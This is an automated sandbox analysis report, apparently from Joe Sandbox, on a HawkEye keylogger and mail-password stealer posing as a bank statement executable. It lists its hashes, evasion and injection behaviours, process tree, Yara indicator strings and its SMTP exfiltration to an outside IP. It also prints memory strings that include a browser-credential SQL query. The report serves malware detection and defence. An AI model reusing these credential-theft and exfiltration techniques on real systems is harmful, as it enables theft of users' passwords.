Analysis Report BANK-STATMENT _xlsx.exe

Overview

General Information

Sample Name: BANK-STATMENT _xlsx.exe
Analysis ID: 320625
MD5: debe564cd4c27c02d23c828df27fe27f
SHA1: 1b55fba242460cc0a5b38299acaaacf3f54c5e87
SHA256: edafe7e62738e180cb882d93f37d2d306627aef482d6f7a7a06c69198c61cd58
Tags: exe, HawkEye

Detection

HawkEye MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected HawkEye Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara signature match

Startup

  • System is w10x64
  • BANK-STATMENT _xlsx.exe (PID: 1496 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' MD5: DEBE564CD4C27C02D23C828DF27FE27F)
    • BANK-STATMENT _xlsx.exe (PID: 4500 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' MD5: DEBE564CD4C27C02D23C828DF27FE27F)
      • dw20.exe (PID: 5996 cmdline: dw20.exe -x -s 2264 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 7044 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
    • BANK-STATMENT _xlsx.exe (PID: 3984 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4500 5715437 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
      • BANK-STATMENT _xlsx.exe (PID: 1900 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
        • BANK-STATMENT _xlsx.exe (PID: 4240 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
          • dw20.exe (PID: 5456 cmdline: dw20.exe -x -s 2304 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • BANK-STATMENT _xlsx.exe (PID: 6452 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4240 5772140 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
          • BANK-STATMENT _xlsx.exe (PID: 3028 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
            • BANK-STATMENT _xlsx.exe (PID: 1548 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
              • dw20.exe (PID: 5992 cmdline: dw20.exe -x -s 2288 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
              • vbc.exe (PID: 5676 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
              • vbc.exe (PID: 6708 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
            • BANK-STATMENT _xlsx.exe (PID: 2240 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 1548 5785125 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
              • BANK-STATMENT _xlsx.exe (PID: 6984 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                • BANK-STATMENT _xlsx.exe (PID: 6180 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                  • dw20.exe (PID: 5484 cmdline: dw20.exe -x -s 2264 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
                • BANK-STATMENT _xlsx.exe (PID: 6188 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 6180 5810484 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                  • BANK-STATMENT _xlsx.exe (PID: 5540 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                    • BANK-STATMENT _xlsx.exe (PID: 5580 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                      • dw20.exe (PID: 6904 cmdline: dw20.exe -x -s 2324 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
                    • BANK-STATMENT _xlsx.exe (PID: 5588 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 5580 5822718 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                      • BANK-STATMENT _xlsx.exe (PID: 6176 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                        • BANK-STATMENT _xlsx.exe (PID: 2864 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                        • BANK-STATMENT _xlsx.exe (PID: 4608 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 2864 5836578 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["Mail PassView", "mailpv"], "Version": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
    • 0x2674:$hawkstr1: HawkEye Keylogger
    • 0x20ec:$hawkstr2: Dear HawkEye Customers!
    • 0x221e:$hawkstr3: HawkEye Logger Details:
00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
    • 0x7b984:$key: HawkEyeKeylogger
    • 0x7dbb4:$salt: 099u787978786
    • 0x7bfc5:$string1: HawkEye_Keylogger
    • 0x7ce04:$string1: HawkEye_Keylogger
    • 0x7db14:$string1: HawkEye_Keylogger
    • 0x7c39a:$string2: holdermail.txt
    • 0x7c3ba:$string2: holdermail.txt
    • 0x7c2dc:$string3: wallet.dat
    • 0x7c2f4:$string3: wallet.dat
    • 0x7c30a:$string3: wallet.dat
    • 0x7d6d8:$string4: Keylog Records
    • 0x7d9f0:$string4: Keylog Records
    • 0x7dc0c:$string5: do not script -->
    • 0x7b96c:$string6: \pidloc.txt
    • 0x7b9fa:$string7: BSPLIT
    • 0x7ba0a:$string7: BSPLIT
00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
25.2.vbc.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
7.2.vbc.exe.400000.0.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
    • 0x7b89c:$key: HawkEyeKeylogger
    • 0x7dacc:$salt: 099u787978786
    • 0x7bedd:$string1: HawkEye_Keylogger
    • 0x7cd1c:$string1: HawkEye_Keylogger
    • 0x7da2c:$string1: HawkEye_Keylogger
    • 0x7c2b2:$string2: holdermail.txt
    • 0x7c2d2:$string2: holdermail.txt
    • 0x7c1f4:$string3: wallet.dat
    • 0x7c20c:$string3: wallet.dat
    • 0x7c222:$string3: wallet.dat
    • 0x7d5f0:$string4: Keylog Records
    • 0x7d908:$string4: Keylog Records
    • 0x7db24:$string5: do not script -->
    • 0x7b884:$string6: \pidloc.txt
    • 0x7b912:$string7: BSPLIT
    • 0x7b922:$string7: BSPLIT
1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: vbc.exe.6920.6.memstr, Malware Configuration Extractor: HawkEye {"Modules": ["Mail PassView", "mailpv"], "Version": ""}
Multi AV Scanner detection for submitted file
Source: BANK-STATMENT _xlsx.exe, Virustotal: Detection: 40%
Source: BANK-STATMENT _xlsx.exe, ReversingLabs: Detection: 41%
Machine Learning detection for sample
Source: BANK-STATMENT _xlsx.exe, Joe Sandbox ML: detected
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exeBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exeBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: [autorun]
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00408900 FindFirstFileA,GetLastError,0_2_00408900
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AC0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00408900 FindFirstFileA,GetLastError,2_2_00408900
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00405AC0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00406EC3
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,7_2_00408441
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,7_2_00407E0E

                Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49746 -> 166.62.27.57:587
May check the online IP address of the machine
Source: unknown, DNS query: name: whatismyipaddress.com
Source: global traffic, TCP traffic: 192.168.2.4:49746 -> 166.62.27.57:587
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 104.16.154.36
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... 
open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... 
open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: BANK-STATMENT _xlsx.exe, vbc.exe
String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown
DNS traffic detected: queries for: 201.75.14.0.in-addr.arpa
Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmp
String found in binary or memory: http://go.microsoft.
Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmp
String found in binary or memory: http://go.microsoft.LinkId=42127
